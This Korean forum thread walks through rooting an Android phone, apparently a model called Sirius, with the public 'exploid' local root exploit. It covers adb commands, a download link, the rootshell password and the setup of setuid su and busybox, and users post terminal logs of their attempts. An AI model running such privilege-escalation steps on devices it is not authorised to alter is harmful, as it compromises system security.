어제 펌웨어를 개조하는방법으로 루팅에 성공하였으나...
오늘 새로운 익스플로잇이 공개되고 이 익스플로잇이 시리우스에 적용가능하니 새로나온걸로 설명해드립니다.
사실 드로이드 루팅방법이라이 다를게 없지만 시리우스에는 cp가 없는관계로 쪼금 달라집니다.
또한 adb 사용이 능하신 분에게만 적합한 메뉴얼 입니다.
1. http://www.mediafire.com/?ow17z7kgf472xw9 파일을 받으세요.
2. "adb push Superuser.apk /sdcard/Superuser.apk"
3. "adb push su /sdcard/su"
4. "adb push busybox /sdcard/busybox"
5. "adb push exploid /sqlite_stmt_journals/exploid"
6. "adb push busybox /sqlite_stmt_journals/busybox"
7. "adb shell"
8. "cd sqlite_stmt_journals"
9. "chmod 755 exploid"
10. "chmod 755 busybox"
11. 다음단계를 하기전에 설정에서 wifi를 바로 켜고/끌 수 있는상태로 핸드폰을 세팅해놓음
12. "./exploid"
13. 12단계를 실행 하자마자 wifi를 켜기/끄기 실행(켜진걸 꺼따가 다시 켜시거나, 꺼진걸 켰다가 다시 끄시면 됩니다.)
14. "rootshell"
15. 비번으로 "secretlol" 을 치면 루트쉘이 떨어짐
16. "./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk"
17. "./busybox cp /sdcard/su /system/bin/su"
18. "./busybox cp /sdcard/busybox /system/bin/busybox"
19. "chmod 4755 /system/bin/su"
20. "chmod 4755 /system/bin/busybox"
21. "rm /system/bin/rootshell"
끗!!!
첫 시도에서 실패하고 두번째 시도 에서 성공한것 같은대... 루트권한 획득한것을 어디에서 확인가능합니까?
C:\temp>adb push Superuser.apk /sdcard/Superuser.apk
576 KB/s (0 bytes in 27688.000s)
C:\temp>adb push su /sdcard/su
820 KB/s (0 bytes in 26248.000s)
C:\temp>adb push busybox /sdcard/busybox
4816 KB/s (0 bytes in 1926944.000s)
C:\temp>adb push exploid /sqlite_stmt_journals/exploid
744 KB/s (0 bytes in 11917.000s)
C:\temp>adb push busybox /sqlite_stmt_journals/busybox
4816 KB/s (0 bytes in 1926944.000s)
C:\temp>adb shell
$ cd sqlite_stmt_journals
cd sqlite_stmt_journals
$ chmod 755 exploid
chmod 755 exploid
$ chmod 755 busybox
chmod 755 busybox
$ ./exploid
./exploid
[*] Android local root exploid (C) The Android Exploid Crew
[*] Modified by birdman for the DroidX
[+] Using basedir=/sqlite_stmt_journals, path=/sqlite_stmt_journals/exploid
[+] opening NETLINK_KOBJECT_UEVENT socket
[+] sending add message ...
[*] Try to invoke hotplug now, clicking at the wireless
[*] settings, plugin USB key etc.
[*] You succeeded if you find /system/bin/rootshell.
[*] GUI might hang/restart meanwhile so be patient.
$ rootshell
rootshell
Password (echoed):secretlol
secretlol
# ./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
# ./busybox cp /sdcard/su /system/bin/su
./busybox cp /sdcard/su /system/bin/su
# ./busybox cp /sdcard/busybox /system/bin/busybox
./busybox cp /sdcard/busybox /system/bin/busybox
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# rm /system/bin/rootshell
rm /system/bin/rootshell
#
폰을 재부팅 하니 루트쉘을 만날수 없게 되었습니다 ㅠㅡㅠ;
*: 슈퍼유저 퍼미션 앱을 켜니 다시 루트쉘을 만나게 되는군요
좀더 자세한 사용법안내를 부탁드립니다
adb실행시 프롬프트가 "$"표시로 떨어지면 유저쉘이구여
"#" 표시로 떨어지면 루트쉘입니다.
익스플로잇을 실행후에 "#"으로 바뀐게 루트쉘으로 변해서 바뀐거구여
루트쉘일때 su와 superuser를 깔아주면 익스플로잇 실행없이
"$" 표시가 나오는 유저쉘일때 "su" 명령어만 쳐주시면 됩니다.
su와 superuser 어떻게 깔아주나요;;; su 명령어 치니 이러한 현상이 나오고 안되네요.
C:\adb>adb push Superuser.apk /sdcard/Superuser.apk
failed to copy 'Superuser.apk' to '/sdcard/Superuser.apk': Permission denied
C:\adb>adb push Superuser.apk /sdcard/Superuser.apk
27 KB/s (0 bytes in 27688.001s)
C:\adb>adb push su /sdcard/su
25 KB/s (0 bytes in 26248.001s)
C:\adb>adb push busybox /sdcard/busybox
3884 KB/s (0 bytes in 1926944.000s)
C:\adb>adb push exploid /sqlite_stmt_journals/exploid
744 KB/s (0 bytes in 11917.000s)
C:\adb>adb push busybox /sqlite_stmt_journals/busybox
4152 KB/s (0 bytes in 1926944.000s)
C:\adb>adb shell
$ cd sqlite_stmt_journals
cd sqlite_stmt_journals
$ chmod 755 exploid
chmod 755 exploid
$ chmod 755 busybox
chmod 755 busybox
$ ./exploid
./exploid
[*] Android local root exploid (C) The Android Exploid Crew
[*] Modified by birdman for the DroidX
[+] Using basedir=/sqlite_stmt_journals, path=/sqlite_stmt_journals/exploid
[+] opening NETLINK_KOBJECT_UEVENT socket
[+] sending add message ...
[*] Try to invoke hotplug now, clicking at the wireless
[*] settings, plugin USB key etc.
[*] You succeeded if you find /system/bin/rootshell.
[*] GUI might hang/restart meanwhile so be patient.
$ rootshell
rootshell
Password (echoed):secretlol
secretlol
# ./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
# ./busybox cp /sdcard/su /system/bin/su
./busybox cp /sdcard/su /system/bin/su
# ./busybox cp /sdcard/busybox /system/bin/busybox
./busybox cp /sdcard/busybox /system/bin/busybox
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# rm /system/bin/rootshell
rm /system/bin/rootshell
# su
su
[1] Illegal instruction su
# exit
exit
$ exit
exit
C:\adb>adb shell
$ su
su
[1] + Stopped (signal) su
$
오우.. 올려주셨군요.. 감사합니다
한번 해봐야겠네요